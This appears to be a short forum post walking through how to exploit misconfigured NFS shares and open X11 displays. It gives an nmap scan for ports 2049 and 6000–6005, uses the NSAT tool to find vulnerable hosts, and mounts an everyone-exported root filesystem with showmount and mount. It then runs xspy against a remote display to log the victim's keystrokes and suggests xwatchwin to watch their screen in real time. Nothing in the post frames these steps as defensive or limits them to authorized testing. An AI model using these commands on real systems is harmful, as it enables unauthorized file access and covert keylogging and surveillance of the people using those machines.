In order to exploit NFS shares and X window configurations, you first need to perform a nmap scan looking for their corresponding ports. Example:

Code:
nmap -P0 -sS -p 2049,6000,6001,6002,6003,6004,6005 -iL iprange.txt
Go through your scan results and look for IP's with these ports open. If you find some, then we can try to take advantage of them.

Now, we use the NSAT tool to determine if they are misconfigured. You can get the tool here:
http://forums.remote-exploit.org/showthread.php?t=12312

Once the tool is installed, you need rpc.nfsd. I installed the nfs-utils-1.1.2-2.fc9.i386.tar package to get this dependency (maybe the final BT3 will have it?).

NFS (port 2049):
Code:
rpc.portmap start
rpc.nfsd start
showmount -e 192.168.x.x
Export list for 192.168.x.x:
/ (everyone)
mkdir /mnt/temp
mount 192.168.x.x:/ mnt/temp
cd /mnt/temp
ls
X (port 6000-6005):
Code:
nsat -C nsat_x.conf -f X_hosts.txt -n
192.168.x.x dumpable/sniffable
192.168.x.x dumpable/sniffable

cd /pentest/sniffers/xspy
xspy -display 192.168.x.x:0
This should provide you keylogging of the remote computer. There are other tools for viewing the remote desktop, xwatchwin and xwd, but the install process in Backtrack is time consuming (and I dont remember where I got the dependencies). However, if you have Ubuntu, you can do apt-get install xwatchwin. Run it against one of your vulnerable IP's and see what the remote user is doing in real time.

William